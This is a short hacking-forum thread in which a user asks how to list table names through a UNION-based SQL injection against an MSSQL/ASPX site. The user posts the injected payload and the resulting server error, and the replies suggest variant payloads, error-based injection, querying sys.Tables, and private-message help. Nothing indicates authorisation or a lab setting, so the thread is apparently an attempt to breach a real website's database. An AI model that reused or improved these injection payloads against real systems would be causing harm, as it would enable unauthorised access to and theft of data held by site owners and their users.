mssql union

hey
I wanna find table names with sqli for mssql aspx
I inject:
01/02/2000 union SELECT Distinct TABLE_NAME FROM information_schema.TABLES –
get:
Could not find file ‘C:\Windows\SysWOW64\inetsrv\information_schema.mdb’.

what is the uncorrect ?

Try union distinct select

Or u can try error based sqli

thanks, i tried distinct select, same.

U can PM me , if u want to give a try

If it’s MSSQL USE [DBNAME]; SELECT * FROM sys.Tables; I think. You might be able to do DBNAME.sys.Tables but I haven’t tested it so can’t say for sure.